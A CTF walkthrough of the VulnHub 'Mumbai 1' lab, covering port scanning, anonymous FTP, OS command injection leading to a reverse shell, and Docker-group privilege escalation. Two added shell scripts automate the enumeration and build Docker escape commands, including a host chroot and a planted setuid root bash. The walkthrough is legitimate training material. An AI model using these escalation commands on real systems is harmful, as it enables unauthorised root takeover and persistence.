Capture the flag (CTF)

Mumbai 1: VulnHub CTF walkthrough

August 27, 2020 by LetsPen Test

In this article, we will solve a capture the flag (CTF) challenge that was posted on the VulnHub website by an author named Dylan Barker. As per the description given by the author, this is an intermediate-level CTF, and the goal is to gain root access on the machine and read the flag file. You can check my previous articles for more CTF challenges.

I have provided a download URL for this CTF. You can download the machine and run it in VirtualBox. A torrent download is also available for this VM; both links are listed in the Sources section.


For those who are not aware of the site, VulnHub is a well-known website for security researchers which aims to provide users with a way to learn and practice their hacking skills through a series of challenges in a safe and legal environment. You can download vulnerable machines from this website and try to exploit them. There are a lot of other challenging CTF exercises available on VulnHub and I highly suggest attempting them, as it is a good way to sharpen your skills and learn new techniques in a safe environment.

Please note: For all these machines, I have used Oracle VirtualBox to run the downloaded machine. I am using Kali Linux as an attacker machine for solving this CTF. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.

Summary of the steps

The summary of the steps for solving this CTF:

  1. Getting the IP address by using the Netdiscover utility
  2. Identifying open ports by using Nmap
  3. Enumerating FTP service
  4. Enumerating HTTP service
  5. Identifying vulnerabilities
  6. Getting the local access
  7. Enumeration for local exploit
  8. Exploiting Docker and getting the root

The walkthrough

Step 1

The first step to start any CTF is to identify the target machine IP address. Since we are running a virtual machine in the same network, we can identify the target machine IP address by running the netdiscover command. The output of the command can be seen in the following screenshot.

Command used: netdiscover

In the highlighted area above, we can see the target machine IP address. The target machine IP address is 192.168.1.2 and my Kali machine IP address is 192.168.1.54. We will be using 192.168.1.54 as the attacker machine IP address.

Note: Since the IP addresses are being assigned by the DHCP, they may be different in your case, depending on the network configuration.

Step 2

The next step is port scanning, which tells us which ports are open. We can then explore those ports to identify vulnerabilities in the target system. I launched an Nmap full-port scan, which checks all 65,535 TCP ports. The command and the results of the Nmap scan can be seen in the screenshot given below.

Command used: nmap -p- -sV 192.168.1.2

You can see that this time we used the -p- option with Nmap. It scans all 65,535 TCP ports instead of Nmap's default top 1,000, so services on unusual ports such as 8000 are not missed; -sV additionally probes each open port to identify the service and its version. In the above screenshot, we can see a large output generated by the Nmap scan. The summary of the scan is given below.

  • Port 21, the default port for FTP, was open and running vsftpd 3.0.3
  • Port 22 was also open, running SSH; the version appears to be up to date
  • Ports 80 and 8000 were open, both running an HTTP service
  • Port 3306 was open, running MySQL

Step 3

Because the Nmap scan showed the FTP port open on the target machine, I started enumerating the service by trying an anonymous login. This luckily worked on the target machine.

Command used: ftp 192.168.1.2

Anonymous login:

  • Username: anonymous
  • Password: anonymous

The above screenshot shows that we are able to log into the target machine over FTP as the anonymous user. After that, I ran the ls command, which shows a file named “Note” in the current directory. Let’s download this file to our attacker machine and do some further analysis.

Commands used:

  • get Note
  • cat Note

In the above screenshot, we can see that I first used the get command to download the file over FTP to the attacker machine, then read it with cat.

The file contains a message hinting at a few possible weak points on the target machine that can be explored further. It states that there are “HTTP servers running to Docker” and that there are privilege escalation issues on the server.

Beyond that hint, the note does not give much information. In the next step, we will try to get more from the HTTP services.

Step 4

As we have already identified that ports 80 and 8000 are open on the target machine and both serve HTTP, let’s open the target machine IP address in the browser. It can be seen in the following screenshot:

In the above screenshot, we can see the web application served on the default port 80. It does not give us any useful information. Let’s open the target machine IP on port 8000 in the browser, which can be seen below.

It was showing a default page. Now, let’s try to get more information on the web applications by running dirb, which will help us identify further entry points. I executed dirb and the output of the scan can be seen in the following screenshot.

Command used: dirb http://192.168.1.2/

In the above highlighted area, we can see two directories identified by the tool. I manually checked all the files listed in the scan output; none gave any direct information that would help us go further. I then opened the directories in the browser, hoping to see internal files since directory listing was enabled on the server, but no file was present:

After this, I opened the other directory in the browser, which can be seen in the following screenshot.

This turned out to be a WordPress website. WordPress installations become an easy target when the core, themes or plugins are not kept up to date, so I decided to identify and explore vulnerabilities in the website before running DirBuster. I used the WPScan tool, which is available in Kali Linux by default. The command and scan results can be seen below.

Command used: wpscan --url http://192.168.1.2/wordpress

WPScan reported a few minor issues, but none of them were useful in our case, so we move on to DirBuster.

DirBuster is a tool that brute-forces hidden directories and files on a web server. The output of the tool can be seen in the following screenshot.

By running DirBuster, we found some new files on the target machine which we can explore further.

In the next step we will check these files one by one.
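The enumeration in steps 2 to 4 is worth scripting so it can be rerun against any lab target. The following is an added example and not part of the original walkthrough: a POSIX shell script that parses Nmap's grepable (-oG) output for open ports, tries the anonymous FTP login and fetches the note if port 21 is open, and runs dirb against every HTTP port. The live commands (nmap, curl, dirb) run only when TARGET is set; the parsing helpers work offline. TARGET, the dirb wordlist path and the "Note" filename are assumptions about the reader's lab.

```shell
#!/bin/sh
# Added example, not from the original walkthrough. Scripts steps 2-4 of the
# enumeration. Assumptions: TARGET is set by the reader, dirb's common.txt lives
# at the Kali default path, and the FTP file of interest is called "Note".

# Print "port/service" for every open TCP port in nmap -oG output read from stdin.
# A grepable host line looks like (constructed sample):
#   Host: 192.168.1.2 ()  Ports: 21/open/tcp//ftp//vsftpd 3.0.3/, 22/open/tcp//ssh//OpenSSH/  Ignored State: closed (65531)
open_ports() {
    sed -n 's/^Host:.*Ports: //p' |
    sed 's/[[:space:]]*Ignored State.*$//' |
    tr ',' '\n' |
    sed -n 's#^ *\([0-9][0-9]*\)/open/tcp//\([^/]*\)/.*#\1/\2#p'
}

# Given open_ports output on stdin, print the ports carrying one service name,
# space separated: `service_ports http` -> "80 8000"
service_ports() {
    grep "/$1\$" | cut -d/ -f1 | tr '\n' ' ' | sed 's/ $//'
}

# Try an anonymous FTP login (curl speaks FTP natively), list the root directory
# and, on success, download and print the requested file.
ftp_anonymous() {
    host="$1"; file="$2"
    if listing=$(curl -s --user anonymous:anonymous "ftp://$host/"); then
        echo "[+] anonymous FTP login accepted on $host"
        printf '%s\n' "$listing"
        curl -s --user anonymous:anonymous "ftp://$host/$file" -o "$file" && cat "$file"
    else
        echo "[-] anonymous FTP login refused on $host"
    fi
}

# Step 2: full-port version scan; step 3: FTP; step 4: directory brute force.
enumerate() {
    target="$1"
    ports=$(nmap -p- -sV -oG - "$target" | open_ports)
    echo "[*] open ports:"
    printf '%s\n' "$ports"
    if printf '%s\n' "$ports" | grep -q '^21/'; then
        ftp_anonymous "$target" Note
    fi
    for p in $(printf '%s\n' "$ports" | service_ports http); do
        dirb "http://$target:$p/" /usr/share/dirb/wordlists/common.txt -S
    done
}

if [ -n "${TARGET:-}" ]; then
    enumerate "$TARGET"
fi
```

Run it as `TARGET=192.168.1.2 sh enum.sh`. The parser only keeps entries in the `open` state, so filtered or closed ports reported by -sV never reach the FTP or dirb stages.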

Step 5

In this step, I am using Burp Suite for intercepting the requests; you can use any intercepting proxy that you are comfortable with. I started by checking the “test.php” file. This can be seen in the highlighted area of the following screenshot.

As per the above screenshot, fetching the URL with an HTTP GET request returns the error “Please post a proper query,” so let’s try changing the HTTP method from GET to POST. It can be seen in the following screenshot.

After changing the method to POST, we get the same error, so the application is waiting for a specific POST parameter. Let’s add a “query” parameter, as the error suggests.

As we can see, we added a query parameter to the POST request and gave it the web application’s URL as a value. This time we received a different message. Now, let’s append a command keyword to the URL. This can be seen in the screenshot given below.

As we can see, when we supplied “id” in the parameter value, the response showed the user the web server runs as. This means the value of the query parameter is passed to a shell, i.e. the parameter is vulnerable to OS command injection. In the next step, let’s use this weakness to our advantage.

Step 6

In this step, we will write a reverse shell payload and execute it on the target machine through the “query” parameter. I also started a Netcat listener on my attacker machine to receive connections on port 1234. After this, I sent the request. The added payload and the response received can be seen in the following screenshot.

As we can see above, we received a 504 error response from the target machine. That is expected: the injected command never returns while the reverse shell is alive, so the front-end times out waiting on the back-end, but the payload had already executed and we received shell access on the attacker machine. This can be seen in the screenshot below.

We now have the reverse connection of the system, but it is a limited shell. In the next step, let’s move further to get the root access of the target machine.

Step 7

In the previous step, we got shell access as “apiuser”, but it was a limited shell and our target is root on the machine. So I ran a Python one-liner that spawns a proper tty, which gives us a stable shell. After that, I enumerated the kernel and operating system versions of the target machine. This can be seen in the screenshot given below:

Command used:

  • python -c 'import pty;pty.spawn("/bin/bash")'
  • id
  • cat /etc/issue
  • uname -a

In the above screenshot, we can see the operating system and kernel version. I searched online for exploits for these versions, but none of them seemed to work. I started exploring the system for further information that could help us take root access.

Step 8

We know from step 3 that the note hinted that the web applications run in Docker. The apiuser account was allowed to run the docker client, and because the Docker daemon runs as root, anyone who can start containers can mount host directories into them and read or write them with root privileges. I used this to mount the host’s /root directory into an Ubuntu container, which gave us root access to its contents. This can be seen in the following screenshot.

Command used: docker run -it -v /root:/mnt/ignite ubuntu

The container-side mount path must be absolute; Docker rejects a relative path such as mnt/ignite. After getting root access in this way, I started looking for the flag file, which is the last step of the CTF. It was in the container’s /mnt/ignite/ directory, i.e. the host’s /root. We end by reading the flag file.

Command used: cat proof.txt

In the above screenshot, we can see the flag file.
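The escalation in step 8 generalises beyond /root: whoever can talk to the Docker daemon can bind-mount the entire host filesystem and is therefore root on the host. The following is an added example, not part of the original walkthrough, that checks the two ways an unprivileged account usually gets that access (membership of the docker group, or a writable daemon socket) and builds three forms of the escape: the single-directory mount the page used, a chroot into the whole host, and a non-interactive variant that leaves a setuid bash behind for shells that have no tty. The group list and socket path are parameters so the checks run offline; the "ubuntu" image name and the /tmp/rootbash path are assumptions.

```shell
#!/bin/sh
# Added example, not from the original walkthrough. Assumptions: an "ubuntu"
# image is available locally or pullable, and /tmp/rootbash is free on the host.

# 0 if "docker" is one of the groups in a whitespace-separated list (`id -nG`).
in_docker_group() {
    for g in $1; do
        [ "$g" = docker ] && return 0
    done
    return 1
}

# 0 if the daemon socket exists and we can write to it. The daemon runs as root
# and bind-mounts any host path on request, so this is root-equivalent access.
docker_socket_writable() {
    [ -S "$1" ] && [ -w "$1" ]
}

# Mount one host directory into an interactive container, as the walkthrough did
# for /root. The container-side path must be absolute.
mount_dir_cmd() {
    printf 'docker run --rm -it -v %s:/mnt/host %s /bin/bash' "$1" "${2:-ubuntu}"
}

# Generalisation: mount the whole host filesystem and chroot into it, giving a
# root shell on the host itself rather than a view of one directory. -it needs a
# real tty, which is why the walkthrough upgraded the shell with pty.spawn first.
full_chroot_cmd() {
    printf 'docker run --rm -it -v /:/host %s chroot /host /bin/bash' "${1:-ubuntu}"
}

# Variant for a shell without a tty: copy the host's bash and set the setuid bit.
# Afterwards `/tmp/rootbash -p` on the host runs with euid 0 (-p stops bash from
# dropping the elevated euid).
suid_shell_cmd() {
    printf "docker run --rm -v /:/host %s sh -c 'cp /host/bin/bash /host/tmp/rootbash && chmod 4755 /host/tmp/rootbash'" "${1:-ubuntu}"
}

# Report what this machine offers without starting any container.
report() {
    if in_docker_group "$(id -nG)"; then
        echo "[+] docker group member, try: $(full_chroot_cmd)"
    fi
    if docker_socket_writable /var/run/docker.sock; then
        echo "[+] /var/run/docker.sock is writable, try: $(suid_shell_cmd)"
    fi
}

if [ "${1:-}" = report ]; then
    report
fi
```

Run `sh docker_escape.sh report` on the target to see which route applies. The defensive reading is the same check in reverse: `getent group docker` and `ls -l /var/run/docker.sock` on any host show exactly which accounts are root in all but name.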

This completes the CTF. Hope you enjoyed solving it along with me!


Sources

  1. Mumbai: 1, VulnHub
  2. Download Mumbai: 1, VulnHub
  3. Download Mumbai: 1, Google Drive
  4. Download Mumbai: 1, VulnHub (torrent)